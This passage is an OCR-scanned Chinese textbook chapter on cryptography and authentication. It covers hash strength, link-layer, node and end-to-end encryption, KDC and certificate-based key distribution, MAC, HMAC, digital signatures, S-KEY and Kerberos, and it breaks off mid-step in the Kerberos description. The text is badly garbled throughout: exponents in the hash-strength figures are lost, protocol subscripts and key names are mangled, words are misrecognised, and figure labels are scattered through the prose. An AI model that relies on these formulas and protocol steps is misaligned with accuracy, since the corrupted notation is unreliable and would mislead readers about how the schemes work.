的 复杂 和 迭代 产生 很 好 的 混 清 效 果 , 任 何 两 组 很 相似 的 消息 也 不 可 能 生成 相同 的 散 列 码 。 
构造 具有 相同 消息 散 列 码 的 难度 数量 级 为 2” ,而 找 出 给 定 消息 码 的 难度 为 23? 。 

存在 两 种 攻击 散 列 函数 的 方法 : 密码 分 析 法 和 穷 举 攻击 法 。 散 列 函数 防御 穷 举 攻击 
的 强度 完全 取决 于 生成 的 散 列 码 长 度 , 穷 举 一 个 长 度 为 的 散 列 码 需 要 尝试 2 次 ;: 如 果 
进行 抗 碰撞 穷 举 攻击 , 则 需要 尝试 2 次 。 


9.2.4 通信 加 密 


在 通信 过 程 中 ,往往 需要 决定 针对 哪些 内 容 、 在 哪些 位 置 进行 加 密 。 从 实现 的 加 密 层 
次 划分 ,可 分 为 链 路 层 加 密 、 网 络 节点 加 密 和 端 到 端 加 密 ,常用 加 密 方式 是 链 路 层 加 密 和 
端 到 端 加 密 。 

1. 链 路 层 加 密 

在 链 路 两 端 对 数据 报 文 的 每 一 位 都 进行 加 密 , 不 但 对 正文 加 密 , 而 且 对 报 文 头 部 和 校 
验 和 等 控制 信息 加 密 , 这 种 加 密 方式 称 为 “ 链 一 链 " 加 密 ,如 图 9-19 所 示 。 链 路 层 加 密 侧 
重 于 通信 和 链 路 而 不 考虑 节点 , 即 链 路 两 端 都 需要 加 密 设备 ,通过 在 各 链 路 采用 不 同 的 加 密 
密 钥 对 信息 提供 安全 保护 。 当 报 文 传递 到 某 个 中 间 节 点 时 ,必须 解密 以 获得 路 由 信息 和 
校 验 和 ,然后 进行 路 由 选择 和 差错 校 验 , 接 着 再 加 密 发 给 下 一 个 节点 ,直到 报 文 传递 到 目 
的 节点 为 止 。 它 的 缺点 在 于 报 文 每 次 进入 一 个 中 间 节 点 都 需要 进行 一 次 加 /解密 ,中 间 节 
点 可 以 获取 报 文 的 明文 信息 ,只 要 攻击 者 获取 某 个 中 间 节 点 的 控制 权 , 则 可 破解 链 路 加 
密 。 另 外 ,由 于 每 条 链 路 两 端的 一 对 节点 共享 一 个 密 钥 ,不 同 的 节点 对 共享 不 同 的 密 钥 ， 
在 网 络 互联 时 ,需要 提供 非常 多 的 共享 密 钥 ,因此 通常 用 于 对 局 部 数据 的 保护 。 
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2. 网 络 节点 加 密 

为 了 解决 链 路 层 加 密 时 中 间 节 点 会 获取 报 文 的 明文 信息 这 个 问题 ,可 以 在 中 间 节 点 
安装 拥有 加 /解密 的 保护 装置 (图 9-20) , 即 由 该 装置 完成 密 钥 切换 的 工作 。 这 样 ,明文 只 
会 出 现在 保护 装置 中 ,中 间 节 点 的 其 他 部 分 都 不 会 出 现 明文 , 相 比 链 路 加 密 更 安全 。 但 
是 , 它 需 要 修改 网 络 交换 节点 ,增加 保护 装置 ; 另外 ,节点 加 密 要 求 报 文 头 部 和 路 由 信息 
以 明文 传输 ,容易 受到 攻击 。 

3. 端 到 端 加 密 

在 通信 线路 两 端 进行 加 密 ,通信 两 端 必须 共享 相同 的 密 钥 ,数据 在 发 送 端 进行 加 密 ， 


se 
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明文 P 1 保护 明文 P | | | 保护 明文 P 1! 明文 P 
”证 加 | as | Rs | 
链 路 路 1 | 链 路 政 趾 链 路 3 
a En(P)! 区 1|Ee(P 1 Ee Ee 1|Ea(P) 全 
节点 1 He | l 节点 4 
节点 2 节点 3 
图 9-20 节点 加 密 


然后 密 文 穿 过 互联 网 到 达 目 的 端 ,最 后 才 解 密 恢 复 成 明文 数据 (图 9-21)。 由 于 目的 端 和 

发 送 端 共享 一 个 密 钥 , 端 到 端 加 密 还 提供 一 定 程度 的 认证 。 端 到 端 加 密 在 网 络 层 ,传输 层 

或 应 用 层 上 实现 ,如 果 在 网 络 层 加 密 如 IPSec, 通 信和 双方 需要 实现 握手 协商 选择 相应 的 算 

法 ; 如 果 在 传输 层 加 密 如 SSL 协议 , 则 对 用 户 透 明 ; 如 果 在 应 用 层 加 密 , 用 户 可 以 根据 需 

要 选择 不 同 的 加 密 算 法 ; 报 文 在 中 间 节 点 不 需要 解密 ,因此 中 间 节 点 的 不 可 靠 性 不 会 影 

响 报 文 的 安全 性 。 端 到 端 加 密 不 对 网 络 层 和 链 路 层 头 部 进行 加 密 , 它 们 以 明文 方式 传输 。 
明文 P 















































图 9-21 端 到 端 加 密 


可 以 将 链 路 层 加 密 和 端 到 端 加 密 相 结合 以 提高 安全 性 , 链 路 层 加 密 对 协议 信息 进行 
加 密 , 端 到 端 加 密 为 数据 传输 提供 保护 。 


9.2.5 密 钥 分 配 


无 论 是 对 称 加 密 机 制 还 是 公 钥 加 密 机 制 ,加 密 机 制 的 安全 性 取决 于 密 钥 的 安全 性 。 
由 于 两 种 加 密 机 制 的 密 钥 的 性 质 不 同 ,所 以 在 密 钥 分 配 上 存在 的 问题 也 不 同 。 对 称 加 密 
需要 通信 双方 共享 一 个 密 钥 ,而 公 钥 加 密 需要 通信 双方 发 布 公 钥 ,并 防止 私 钥 泄露 。 对 于 
通信 双方 A 和 B, 密 钥 分 配 可 以 有 以 下 几 种 方法 : 

(1) 密 钥 由 A 选 定 ,通过 物理 的 方法 安全 地 传递 给 B。 

(2) 密 钥 由 第 三 方 可 信任 的 C 选 定 ,通过 物理 的 方法 安全 地 传递 给 A 和 B。 

这 两 种 方法 需要 对 密 钥 人 工 传递 ,对 于 大 量 连接 的 网 络 通信 而 言 ,显然 不 适用 。 

(3) A 和 BB 与 第 三 方 可 信任 的 C 建立 加 密 连接 ,C 通过 该 连接 将 密 钥 安全 地 传递 给 
A 和 B,C 称 为 密 钥 分 配 中 心 (KDC) 。 

(4) A 和 B 由 第 三 方 可 信任 的 C 发布 公 钥 , 就 可 以 使 用 彼此 的 公 钥 来 加 密 通信 ,C 为 
证 书 授权 中 心 (CA)。 

1. 基于 对 称 加 密 的 密 钥 分 配 

基于 对 称 加 密 的 密 钥 分 配 通 常 使 用 密 钥 分 配 中 心 (KDC) 实 现 ,由 它 判 断 哪 些 主机 之 
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间 人 允许 相互 通信 。 当 两 个 主机 需要 建立 连接 时 ,KDC 为 这 条 连接 提供 一 个 一 次 性 会 话 密 
钥 。KDC 的 操作 过 程 如 图 9-22 所 示 。 
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图 9-22 基于 KDC 的 密 钥 分 配 过 程 


(1) 当主 机 A 请 求 与 主机 B 建立 连接 时 , 它 传送 一 个 连接 请 求 给 KDC。 主 机 A 和 
KDC 之 间 的 通信 使 用 它们 预先 共享 的 主 密 钥 (Master Key,MKA) 加 密 , 将 加 密 后 的 请 求 
与 自己 的 用 户 名 A 一 并 发 送 给 KDC。 

(2) 如 果 KDC 同意 请 求 , 它 会 使 用 随机 数 生成 算法 产生 一 个 唯一 的 一 次 性 会 话 密 钥 
下, 使 用 主 密 钥 MKA 对 密 钥 KA 进行 加 密 , 把 加 密 后 的 结果 Evx,(K) 发 给 主机 A。 与 此 
同时 ,KDC 使 用 与 B 共享 的 预 主 密 钥 MKa 加 密会 话 密 钥 K 和 用 户 名 A 生成 Evx, (K ,A)， 
然后 再 用 与 A 共享 的 预 主 密 钥 加 密生 成 Ewks (CEwks(CK,A)) 发 给 主机 A。 

(3) 当 A 收 到 信息 后 ,可 以 解密 得 到 会 话 密 钥 K 和 Evx,(K,A), 用 户 A 无 法 解密 
Euxrs(K，,A), 将 它 转 发 给 用 户 B。 

(4) 用 户 也 收 到 从 A 转发 的 Evx, (K ,A) ,解密 后 得 到 会 话 密 钥 K ,并 获知 该 密 钥 用 
来 与 A 进行 通信 。 

(5) A 和 B 现 在 可 以 建立 迎 辑 连接 并 交换 消息 ,使 用 会 话 密 钥 进行 加 密 。 

2. 基于 公 钥 加 密 的 密 钥 分 配 

基于 公 钥 加 密 的 密 钥 分 配 包括 公 钥 分 配 和 对 称 密 钥 分 配 两 部 分 。 公 钥 加 密 技术 使 得 
密 钥 分 配 相对 容易 ,获取 用 户 的 公开 密 钥 有 以 下 4 种 途径 : 

1) 公 钥 密 钥 的 公开 发 布 

任何 用 户 都 可 以 将 他 的 公 钥 发 送 给 其 他 用 户 , 或 者 把 公 钥 广播 。 这 种 方式 的 问题 在 
于 ,任何 人 都 可 以 伪造 公 钥 ,冒充 其 他 用 户 ,发 送 伪造 的 公 钥 给 其 他 人 。 

2) 公开 可 用 目录 

由 可 信任 主机 负责 维护 一 个 公开 的 动态 目录 ,为 每 个 用 户 维护 一 个 目录 项 ,包括 用 户 
名 和 公 钥 ,每 个 目录 的 信息 需要 证 实 其 真实 性 。 每 个 用 户 可 以 从 该 目录 获得 其 他 用 户 的 
公 钥 。 这 种 方式 的 问题 在 于 ,如 果 攻 击 者 获得 目录 管理 机 构 的 控制 权 , 就 可 以 伪造 用 户 公 
钥 , 达 到 冒充 目的 。 

3) 公开 密 钥 管 理 机 构 

相 比 公开 可 用 目录 增加 了 管理 机 构 与 用 户 的 认证 以 及 通信 双方 的 认证 。 每 个 用 户 都 
有 安全 渠道 获得 管理 机 构 的 公开 密 钥 ,而 管理 机 构 的 私 钥 只 有 管理 机 构 才 持 有 。 任 何 用 
户 都 可 以 通过 管理 机 构 获得 其 他 用 户 的 公 钥 ,通过 管理 机 构 的 公 钥 可 以 判断 所 获取 的 其 
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他 用 户 的 公 钥 是 否 可 信 。 这 种 方式 的 问题 在 于 ,每 个 用 户 都 必须 通过 管理 机 构 获 得 其 他 
用 户 的 公 钥 ,使 得 管理 机 构成 为 通信 瓶颈 。 

4) 公开 密 钥 证 书 

公 钥 证 书 不 需要 与 管理 机 构 实 时 通信 , 它 由 公 钥 、 公 钥 所 有 者 的 用 户 ID 、 可 信 的 第 三 
方 签名 等 组 成 ,第 三 方 即 认 证 中 心 CA, 如 政府 或 金融 机 构 , 用 户 通过 安全 渠道 把 他 的 公 
钥 提 供给 CA ,然后 获取 证 书 , 用 户 在 获取 证 书后 就 不 需要 再 与 CA 进行 联系 (图 9-23) , 通 
信 时 只 需要 将 证 书 发 给 对 方 即 可 。CA 作为 可 信任 的 第 三 方 ,负责 检验 公 钥 的 合法 性 。 
证 书 的 作用 是 证 明证 书 中 列 出 的 用 户 合法 地 持 有 证 书 中 列 出 的 公 钥 ,数字 证 书 的 格式 遵 
循 X. 509 标准 ,CA 的 数字 签名 使 得 攻击 者 无 法 伪造 和 算 改 证 书 。 





认证 中 心 
(CA) 
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CA=Eskca(Time, IDA, PKa) 
Ca=Eskcs( Time, IDa, PK 
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图 9-23 公 钥 证 书 


公 钥 算法 可 以 直接 对 消息 加 密 , 但 是 如 果 明 文 消息 很 长 ,加 /解密 速度 就 十 分 缓慢 ,所 
以 事实 上 公 钥 算法 更 多 的 时 候 用 来 分 配对 称 加 密 的 密 钥 。 用 公 钥 算法 保护 对 称 加 密 密 钥 
的 传递 ,从 而 保证 对 称 密 钥 的 安全 性 ,然后 使 用 对 称 密 钥 对 发 送 的 明文 消息 进行 加 密 , 由 
密 钥 的 安全 性 保证 传输 数据 的 安全 性 ,同时 也 充分 利用 了 对 称 加 密 速 度 快 的 特点 。 使 用 
公 钥 算法 分 配对 称 密 钥 的 方式 如 图 9-24 所 示 ,假设 通信 双方 A 和 B 已 经 获取 对 方 的 公 
钥 ,那么 他 们 之 间 分 配对 称 密 钥 的 过 程 如 下 : 























Epxka(Ni, IDA) 1 
EpkA(Ni, N2) 
发 送 方 A | 接收 方 B 
Epka(N2) f 
Epka(Esk,(K)) 


图 9-24 公 钥 分 配对 称 密 钥 


(1) A 使 用 B 的 公开 密 钥 PKs 加 密 一 个 报 文 发 给 B, 内 容 包 括 A 的 标识 符 IDA 和 一 
个 随机 数 Ni 。 

(2) B 收 到 报 文 后 ,使 用 A 的 公 钥 PKs 加密 应 答 报 文 给 A, 内 容 包括 收 到 的 随机 数 
Ni 和 一 个 新 生成 的 随机 数 N; ,因为 只 有 B 才 可 以 解密 A 发 过 来 的 报 文 ,所 以 应 答 报 文 
中 的 Ni 用 于 通知 A, 这 是 对 刚才 A 发 送 的 报 文 的 应 答 。 

(3) A 使 用 B 的 公 钥 PKas 加 密 Na ,产生 Eeks (Na ) 并 发 送 给 B, 因 为 只 有 A 才 可 以 解 
密 也 刚才 发 送 的 应 答 报 文 ,所 以 也 解密 Erk, (CNz) 即 可 确认 A 的 身份 。 
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(4) A 生成 对 称 密 钥 玉 , 并 使 用 自己 的 私 钥 对 K 进行 加 密生 成 Esx、(K), 保 证 K 确 
实 由 A 产生 ,再 用 B 的 公 钥 加 密 产生 Epx, (Esk、(K)), 保 证 只 有 B 才能 解密 。 

(5) B 收 到 密 文 ,首先 用 自己 的 私 钥 解 密 得 到 Esk、(K) ,然后 再 用 A 的 公 钥 进行 解密 
就 得 到 了 K ,从 而 获得 与 A 共享 的 对 称 密 钥 KK, 继 而 通过 K 与 A 实现 安全 通信 。 

使 用 这 种 方式 ,用 户 在 每 次 进行 加 密 通信 时 都 可 以 使 用 不 同 的 对 称 密 钥 ,从 而 增加 了 
破解 的 难度 。 


9.3 认证 技术 


认证 指 用 于 验证 所 传输 数据 的 完整 性 的 过 程 ,一 般 可 分 为 消息 认证 和 身份 认证 两 种 
技术 。 消 息 认 证 用 于 保证 信息 的 完整 性 和 不 可 否认 性 ,覆盖 加 /解密 和 数字 签名 等 内 容 ， 
它 可 以 检测 信息 是 否 被 第 三 方 自 改 或 伪造 ; 身份 认证 包括 身份 识别 和 身份 验证 。 消 息 认 
证 可 以 防御 伪装 、 自 改 、 顺 序 修 改 和 时 延 修改 等 攻击 ,数字 签名 还 可 以 防御 否认 攻击 。 总 
的 来 说 ,消息 认证 就 是 验证 所 收 到 的 消息 确实 是 来 自 真正 的 发 送 方 且 未 被 修改 ,也 可 验证 
消息 的 顺序 和 及 时 性 。 

消息 认证 方法 包括 消息 认证 码 , 散 列 消息 认证 码 和 数字 签名 三 大 类 。 对 称 加 密 算法 
因为 通信 双方 共享 一 个 密 钥 , 也 能 提供 一 定 程度 的 认证 功能 。 


9.3.1 消息 认证 码 


消息 认证 码 (Message Authentication Code, MAC) 指 利用 密 钥 产生 的 一 小 块 数据 ,并 
附加 到 传输 的 消息 上 。 假 设 通信 双方 A 和 B 共享 一 个 对 称 密 钥 Kas , 当 A 要 发 送 消息 M 
给 B 时 ,A 计算 消息 认证 码 MAC ,利用 某 个 数学 函数 下 生成 MACu 二 Fx, CM) ,将 消息 
连同 验证 码 一 并 传送 给 B。B 对 收 到 的 消息 M 使 用 Ka 做 相同 运算 ,生成 MAC ,将 
MAC 与 MACw 比 较 , 若 收 到 的 认证 码 MACw 与 MAC' 相 同 , 则 可 得 出 以 下 结论 : 

(1) B 能够 确认 消息 没有 被 算 改 ,如 果 攻 击 者 算 改 消息 而 没有 修改 MACw ,那么 B 计 
算 的 MAC' 不 可 能 等 于 MACw ,这 里 假设 攻击 者 不 可 能 知道 Kap。 

(2) B 确保 消息 M 来 自发 送 方 A, 因 为 没有 其 他 人 知道 Ka ,所 以 别人 无 法 正确 生成 
MACw。 

(3) 如 果 消 息 中 包含 序列 号 ,攻击 者 无 法 算 改 该 序列 号 ,B 可 以 确认 报 文 的 顺序 正 
确 性 。 

许多 算法 都 可 以 生成 MAC, 可 以 使 用 对 称 加 密 算法 (图 9-25) 、 公 钥 加 密 算法 (图 9-26)、 
散 列 函 数 (图 9-27) 实 现 。 使 用 加 密 算法 实现 MAC 与 加 密 整个 消息 的 方法 相 比 具 有 优势 ， 
因为 它们 的 计算 量 很 低 。 不 同 的 是 用 于 认证 的 加 密 算法 不 需要 可 道 ,而 算法 可 道 对 于 解 
密 是 必需 的 。 使 用 散 列 函数 配合 通信 双方 预先 共享 的 秘密 数值 也 可 以 实现 消息 认证 , 假 
设 A 和 B 共享 秘 密 数 值 S, 当 A 给 B 发 消息 M 时 ,A 产 生 MACw=SHA 一 512(S,M)， 
把 (CM,MACxu) 发 送 给 B, 由 于 B 知 道 S 值 ,因此 B 可 以 重新 计算 MAC' 二 SHA 一 512(S， 
MD ,验证 MAC' 与 MACu 是 否 相 同 , 秘 密 值 S 并 不 发 送 ,所 以 攻击 者 无 法 修改 MAC 值 ， 
只 要 不 泄露 S, 攻 击 者 就 不 可 能 自 改 消息 。 
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图 9-25 对称 加 密实 现 消息 认证 
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图 9-26 公 和 钥 加 密实 现 消息 认证 














图 9-27 散 列 函 数 实现 消息 认证 


9.3.2 散 列 消息 认证 码 


使 用 散 列 函数 实现 认证 的 变形 方法 是 HMAC, 即 散 列 消息 认证 码 , 使 用 HMAC 速 
度 比 对 称 加 密 快 ,而 且 散 列 函数 的 库 代 码 十 分 广泛 。HMAC 的 设计 目标 是 : 

(1) 无 须 改动 直接 使 用 散 列 函数 。 

(2) 使 用 和 处 理 密 钥 简单 。 

(3) 移植 性 很 好 。 

(4) 保持 原 有 散 列 函数 的 性 能 。 
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(5) 基于 散 列 函 数 的 合理 假设 ,能 很 好 理解 和 分 析 认 证 机 制 的 密码 强度 ， 

HMAC 把 散 列 函 数 当成 黑 盒 , 即 把 散 列 函 数 当成 一 个 模块 ,好 处 是 : 可 以 充分 利 
用 现 有 库 代码 ; @ 方 便 地 替换 不 同 的 散 列 函 数 ，@ 当 散 列 函数 的 安全 性 受到 威胁 时 ,可 
以 方便 地 用 更 安全 的 模块 或 函数 替换 它 。 图 9-28 给 出 了 HMAC 的 操作 过 程 : 

(1) 5 指 分 组 中 的 比特 数 , 工 指 消息 M 中 的 jg， jipad 
分 组 数 ,Y, 指 第 i 个 分 组 , 互 为 嵌入 的 散 列 丽 数 ， 广 | 

(2) K 指 密 钥 ,n 指 生成 的 散 列 码 长 度 ,如 
果 玉 长 度 大 于 5b, 将 KK 作为 散 列 函数 的 输入 生 
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成 比特 的 密 钥 ; 

(3) K 十 指 KK 的 长 度 如 果 小 于 5b, 则 左边 填 lv 和 
充 0 直到 长 度 为 5, 如 果 大 于 等 于 65 则 等 于 K; K+ opad 1 "比特 

(4) ipad=00110110,0pad=01011100; LL Ms lan 

9 首先 在 K 的 左边 填充 0 生成 KK 十 , 然 站 Jo 

后 ipad 与 K 十 异 或 生成 5 比特 的 分 组 S, ,将 该 训 
消息 M 追加 在 S, 后 ,接着 计算 出 HGSi;| |MD); 本 | 

(6) 将 opad 与 十 进行 异 或 生成 5 比特 的 wv——— 
分 组 S,, 将 HGSi|1MD 追 加 到 ,后面 ,最 后 计算 和 
出 HC(S,|IHGS| IM)). — 

计算 过 程 中 生成 的 S; 和 S, 相 当 于 从 中 图 9-28 HMAC 结构 


伪 随 机 地 生成 了 两 个 密 钥 ,HMAC 的 执行 时 间 
与 散 列 函 数 执行 时 间 近 似 , 它 执行 了 3 次 基本 散 列 函 数 计算 。 


9.3.3 数字 签名 


数字 签名 用 来 保证 信息 传输 过 程 中 信息 的 完整 性 和 确认 信息 发 送 者 的 身份 ,在 
OSP7498-2 标准 中 定义 为 :“ 附 加 在 数据 单元 上 的 一 些 数据 ,或 是 对 数据 单元 所 做 的 密码 
变换 ,这 种 数据 和 变换 允许 数据 单元 的 接收 方 用 于 确认 数据 单元 来 源 和 数据 单元 的 完整 
性 ,并 保护 数据 ,防止 被 人 进行 伪造 "。 数 字 签 名 主要 使 用 公 钥 加 密 技术 实现 。 

在 网 络 通信 中 ,消息 的 接收 方 可 以 伪造 报 文 ,并 声称 是 发 送 方 发 过 来 的 ,从 而 获取 非 
法 利益 。 同 样 ,信息 的 发 送 方 也 可 以 和 否认 曾经 发 送 过 报 文 ,从 而 获取 非法 利益 。 因 此 需要 
一 种 安全 技术 来 解决 在 通信 过 程 中 的 争端 ,数字 签名 技术 必须 满足 下 列 要 求 : 

(1) 发 送 方 事后 不 能 否认 发 送 的 报 文 签名 。 

(2) 接收 方 能 够 核实 发 送 方 发 送 的 报 文 签名 。 

(3) 接收 方 不 能 伪造 发 送 方 的 报 文 签名 。 

(4) 接收 方 也 不 能 对 发 送 方 的 报 文 进行 部 分 自 改 。 

数字 签名 的 基本 过 程 如 图 9-29 所 示 : 

(1) 采用 散 列 算法 厂 对 明文 P 运算 ,生成 固定 长 度 的 散 列 码 及 (P) , 称 为 报 文摘 要 ， 
保证 不 同 报 文摘 要 值 不 同 ; 

(2) 发 送 方 A 用 自己 的 私 钥 对 摘要 互 (P) 加 密 , 生 成 A 的 数字 签名 ; 
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图 9-29 数字 签名 原理 


(3) 将 数字 签名 作为 明文 P 的 附件 ,与 P 一 起 发 送 给 接收 方 ; 

(4) 接收 方 首先 采用 散 列 算法 对 收 到 的 已 进行 计算 ,得 到 五 C(P') ,然后 再 用 A 的 公 
钥 解密 签名 ,还 原 出 发 送 方 的 互 CP) ,最 后 比较 H(P) 和 有 H(P') 是 否 相同 ,相同 则 认为 有 
效 ,不同 则 认为 报 文 被 自 改 。 

实现 数字 签名 有 多 种 方法 ,如 公 钥 加 密 标准 (PKCS) 、 数 字 签 名 算法 (DSA)、X. 509 
公 钥 证 书 和 PGP 等 。 按 照 数字 签名 的 执行 方法 划分 ,可 分 为 直接 数字 签名 和 仲裁 数字 
签名 。 

直接 数字 签名 指数 字 签 名 的 执行 过 程 只 有 通信 双方 参与 ,并 假定 双方 有 共享 密 钥 或 
接收 方 知道 发 送 方 的 公 钥 。 数 字 签名 使 用 发 送 方 的 私 钥 加 密 消息 的 摘要 值 , 该 方案 的 缺 
点 是 安全 性 取决 于 发 送 方 密 钥 的 安全 性 ,发送 方 可 能 声称 自己 的 密 钥 丢失 ,自己 的 签名 是 
他 人 伪造 的 ,图 9-29 描述 的 就 是 直接 数字 签名 。 

仲裁 数字 签名 (图 9-30) 可 以 解决 直接 数字 签名 的 缺陷 。 发 送 方 A 对 发 往 接收 方 的 
消息 签名 后 ,将 消息 和 签名 先 发 给 仲裁 者 ,仲裁 者 对 消息 和 签名 认证 后 ,附加 一 个 表示 已 
通过 认证 的 消息 ,一同 发 给 接收 方 。 认 证 消息 实际 上 是 由 仲裁 方 的 私 钥 加 密 的 原始 消息 
和 原始 签名 ,由 于 接收 方 存 有 仲裁 方 生成 的 认证 信息 ,发 送 方 无 法 对 自己 发 出 的 消息 予以 
否认 。 整 个 过 程 中 ,仲裁 方 必须 得 到 通信 双方 的 高 度 信任 。 
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图 9-30 ”仲裁 数字 签名 
9.3.4 身份 认证 


身份 认证 包括 身份 识别 和 身份 验证 ,身份 识别 指明 确 访问 者 的 身份 ,身份 验证 是 对 访 
问 者 声称 的 身份 进行 确认 。 根 据 使 用 的 环境 不 同 ,可 以 分 为 单机 状态 身份 认证 和 网 络 环 
境 身份 认证 。 

1. 单机 状态 身份 认证 

单机 状态 身份 认证 相对 网 络 环境 身份 认证 比较 容易 ,通常 有 以 下 几 种 形式 : 
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(1) 用 户 知道 的 东西 (基于 知识 的 证 明 ) : 如 口令 ,密码 ; 


(2) 用 户 拥 有 的 东西 (基于 持 有 的 证 明 ) : 如 智能 卡 、 通 行 证 ,USB key; 

(3) 用 户 具 有 的 生物 特征 (基于 属性 的 证 明 ) : 如 指纹 ,脸形 .声音 .虹膜 .DNA; 

(4) 用 户 的 行为 特征 : 如 笔迹 .打字 速度 等 。 

每 种 方法 都 有 自身 弱点 ,可 以 将 两 种 形式 组 合 , 称 为 双 因 素 身 份 认证 。 

基于 口令 的 身份 认证 最 为 常用 ,存储 口令 的 方式 包括 明文 存储 、 哈 希 散 列 码 存储 和 加 
盐 的 哈 希 散 列 码 存储 。 使 用 散 列 码 存储 口令 的 优点 在 于 即使 攻击 者 得 到 了 口令 文件 ,也 
无 法 通过 散 列 值 反 向 得 到 明文 口令 ,相对 增加 了 安全 性 。 但 是 , 它 的 问题 在 于 用 户 往往 选 
择 容易 记忆 和 容易 被 猜测 的 口令 ,此 时 容易 被 字典 攻击 、 暴 力 攻 击 和 彩虹 表 攻 击破 解 。 随 
着 自动 化 破解 工具 的 流行 ,基于 口令 的 身份 认证 已 经 越 来 越 不 可 靠 。 

基于 智能 卡 的 认证 是 一 种 双 因 素 认证 ,也 称 为 增强 型 认证 ,不 但 要 求 用 户 知道 个 人 身 
份 识别 码 (PIN) ,而 且 要 求 用 户 拥有 智能 卡 。 智 能 卡 经 过 硬件 加 密 , 安 全 性 较 高 ,其 中 存 
储 用 户 和 认证 服务 器 共享 的 秘密 信息 。 进 行 认证 时 ,用 户 输入 PIN 码 ,智能 卡 识别 PIN 
码 是 否 正 确 , 然 后 读 取 卡 中 的 秘密 信息 与 认证 服务 器 进行 认证 。 单 纯 的 PIN 码 丢弃 或 者 
智能 卡 被 盗 , 不 会 影响 安全 性 。 

基于 生物 特征 的 认证 以 人 体 唯一 的 、 稳 定 的 生物 特征 为 依据 ,利用 计算 机 进行 图 像 处 
理 和 模式 识别 ,用 户 在 登录 时 由 特征 识别 系统 提取 相应 特征 ,与 预先 存储 在 数据 库 中 的 特 
征 模 式 进行 匹配 ,以 确定 是 否 是 用 户 本 人 。 生 物 特征 可 以 随身 携带 ,并 且 因 人 而 异 , 所 以 
该 技术 安全 性 和 可 靠 性 很 高 ,其 缺点 在 于 速度 较 慢 。 

2. 网 络 环境 身份 认证 

网 络 环境 中 ,由 于 传输 的 信息 很 容易 被 监听 和 截获 ,攻击 者 截获 到 口令 散 列 码 后 ,很 
容易 通过 重 放 攻击 冒充 合法 用 户 , 因 此 网 络 身 份 认证 无 法 使 用 静态 口令 ,取而代之 的 是 一 
次 性 口令 认证 技术 。 

S-KEY 是 第 一 个 一 次 性 口令 认证 技术 





























标准 ,其 认证 过 程 如 图 9-31 所 示 。 ed oe 
(1) 客户 端 首先 用 合法 的 用 户 账号 向 服 
务 器 发 起 登录 请 求 ; | 挑战 用 户 A， 随 机 数 N， 散 列 次 数 g| 
(2) 服务 器 向 客户 端 发 送 挑战 信息 : 一 | ee j' 
个 随机 数 N 和 要 求 的 散 列 次 数 Qi 中 最 
(3) 客户 端 对 用 户口 令 散 列 和 随机 数 N De Cn 
进行 Q 次 散 列 计算 ,计算 结果 作为 一 次 性 口 ”是 否 相同 
今 发 送 给 服务 器 ; EAK) 
(4) 服务 器 从 本 地 数据 库 取出 该 用 户 对 " 
应 口令 散 列 ,与 随机 数 N 一 起 计算 Q 次 散 图 9-31 S-KEY 认证 过 程 
列 , 并 将 计算 结果 与 客户 端 发 来 的 口令 做 比 
较 , 判 断 允 许 或 拒绝 


(5) 如 果 人 允许 ,服务 器 生成 一 个 随机 数 作为 随后 的 会 话 密 钥 K ,使 用 该 用 户 的 口令 散 
列 对 开 进行 加 密 ,发 送 给 客户 端 。 
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在 这 个 过 程 中 ,N、Q 和 开 在 网 络 上 传递 ,但 是 它们 都 是 一 次 性 使 用 ,无 法 预测 和 重 
放 , 因 此 安全 性 很 高 。 但 是 S-KEY 没有 完整 性 保护 机 制 ,无 法 对 服务 器 的 身份 进行 认证 ， 
攻击 者 可 以 冒充 服务 器 修改 网 络 中 的 认证 数据 。 另 外 ,由 于 随机 数 N 和 Q 是 明文 信息 ， 
攻击 者 可 以 使 用 穷 举 攻击 来 破解 用 户口 令 散 列 码 。 

另 一 个 著名 的 网 络 身 份 认证 协议 是 Kerberos 协议 , 它 是 一 种 基于 对 称 加 密 算法 ,而 
且 又 采用 独立 认证 服务 器 的 认证 机 制 。 用 户 只 要 输入 一 次 身份 验证 信息 就 可 以 赁 此 信息 
获得 票据 来 访问 多 个 服务 ,用 户 在 对 服务 进行 访问 前 ,必须 先 从 认证 服务 器 上 获取 相应 服 
务 的 票据 。 认 证 服务 器 实现 服务 程序 和 用 户 之 间 的 双向 认证 。Kerberos 协议 的 认证 过 
程 如 图 9-32 所 示 。 除 了 应 用 服务 程序 V 之 外 ,还 包括 两 个 认证 服务 器 ,AS 用 于 确认 客户 
和 身份 , 男 一 个 是 签发 票据 的 服务 器 TGS, 用 于 确认 客户 是 否 授权 访问 某 个 应 用 服务 
程序 。 
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图 9-32 ” ”Kerberos 协议 认证 过 程 











Kerberos 认证 过 程 的 具体 流程 如 下 ,协议 中 出 现 的 Noncel 和 Nonce2 都 是 随机 数 ， 
用 于 唯一 标识 此 次 认证 过 程 : 

(1) 客户 C 首先 向 AS 发 起 认证 请 求 , 包 括 客 户 名 IDc ,TGS 服务 器 名 IDres ,以 及 认 
证 有 效 时 间 TIMES。 

(2) AS 检索 数据 库 , 得 到 C 的 口令 PWe ,然后 从 PWc 中 推导 出 密 钥 Ke, 同时 产生 
一 个 随机 数 Kc,rcs 作 为 认证 密 钥 ,AS 一 方面 利用 Kc 加 密 认证 密 钥 Kc.res , 另 一 方面 使 用 
AS 与 TGS 的 共享 密 钥 res 加密 Kec,res 形 成 C 的 服务 票据 Ticketrcs ,然后 发 送 给 C。 

(3) C 利用 密 钥 Kc 解密 认证 密 钥 得 到 Kce,ros ,利用 它 生成 认证 信息 Exc,ros (IDe， 
TS1) ,并 与 Ticketres 一 起 发 送 给 TGS 服务 器 ,认证 信息 中 的 TS1 为 时 间 戳 ,用 于 防止 重 
放 攻 击 。 

(4) TGS 服务 器 利用 共享 密 钥 Ktes 解 密 认 证 密 钥 得 到 Kc,res ,然后 用 Kercs 解 密 认 
证 消息 ,如 果 解 密 后 的 IDc 与 Ticket 中 的 用 户 名 相同 , 则 身份 认证 成 功 , 此 时 C 与 TGS 都 
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得 到 了 由 AS 分 配 的 相同 密 钥 Kc.rcs。 


(5) TGS 服务 器 负责 生成 C 与 应 用 服务 程序 V 之 间 的 认证 密 钥 Kcv ,该 密 钥 用 于 V 
认证 C 的 身份 ,TGS 检索 数据 库 , 获 得 与 V 之 间 的 共享 密 钥 Ky ,然后 一 方面 利用 Ky 加 
密 认 证 密 钥 开 cv , 另 一 方面 使 用 Kc,rcs 加 密 Kev 形成 C 访 问 服务 程序 V 的 票据 Ticketv ， 
然后 发 送 给 C。 

(6) C 使 用 Kc,rcs 解 密 得 到 Kc,v ,利用 它 生成 认证 信息 Erkcv(IDc,TS2,Subkey， 
